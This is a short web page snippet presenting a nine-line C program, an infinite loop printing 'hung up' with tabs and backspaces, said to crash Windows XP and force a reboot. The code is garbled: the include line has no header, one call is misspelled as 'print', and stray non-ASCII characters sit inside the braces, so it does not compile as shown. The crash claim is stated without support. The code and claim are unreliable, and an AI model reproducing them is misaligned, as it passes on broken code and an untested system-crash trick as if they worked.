Example

 

 

This 9 lines infinity loop in C can crash Windows XP and make it reboot.

#include
int main( void )
{กก
for(;;){
    printf( "hung up\t\t\b\b\b\b\b\b" );
    print("hung up\t\t\b\b\b\b\b\b");
กกกกกก }
return 0;
}

 

 

Go Back Main